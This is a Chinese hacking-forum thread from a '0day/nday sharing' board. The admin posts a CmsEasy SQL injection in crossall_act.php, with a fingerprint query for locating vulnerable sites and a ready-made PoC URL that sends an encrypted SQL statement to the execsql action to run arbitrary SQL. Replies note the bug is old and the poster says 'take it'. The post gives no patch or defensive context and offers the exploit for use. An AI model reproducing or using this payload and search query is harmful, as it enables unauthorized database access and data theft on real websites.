设为首页收藏本站
切换到宽版

吾要学习网

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
吾要学习网»论坛 渗透测试 0day/nday分享区 CmsEasy crossall_act.php SQL注入漏洞
返回列表 发新帖
查看: 82|回复: 2

CmsEasy crossall_act.php SQL注入漏洞

[复制链接]
admin
  • TA的每日心情
    无聊
    13 小时前

    • 签到天数: 17 天

    [LV.4]偶尔看看III

    347

    主题

    348

    帖子

    2157

    积分

    管理员

    Rank: 9Rank: 9Rank: 9

    积分
    2157
    发表于 2025-9-22 10:35:44 | 显示全部楼层 |阅读模式
    CmsEasy 存在SQL注入漏洞,通过文件 service.php 加密SQL语句执行即可执行任意SQL命令



    网络测绘:body="cmseasyedit"



    POC  /?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5



    回复

    使用道具 举报

    gaodahai
  • TA的每日心情
    擦汗
    2025-9-24 16:58

    • 签到天数: 1 天

    [LV.1]初来乍到

    0

    主题

    2

    帖子

    25

    积分

    新手上路

    Rank: 1

    积分
    25
    发表于 2025-9-24 17:02:32 | 显示全部楼层
    很老的洞了啊
    回复

    使用道具 举报

    admin
  • TA的每日心情
    无聊
    13 小时前

    • 签到天数: 17 天

    [LV.4]偶尔看看III

    347

    主题

    348

    帖子

    2157

    积分

    管理员

    Rank: 9Rank: 9Rank: 9

    积分
    2157
     楼主| 发表于 2025-9-24 17:12:21 | 显示全部楼层
    拿走不谢
    回复

    使用道具 举报

    返回列表 发新帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    QQ|小黑屋|吾要学习网 ( 陕ICP备2025065860号-1 )|网站地图|陕公网安备61010302001313号

    GMT+8, 2025-10-10 22:28 , Processed in 0.135434 second(s), 25 queries .

    Powered by 吾要学习

    Copyright © 2001-2025, wuyaoxuexi.cn.

    快速回复 返回顶部 返回列表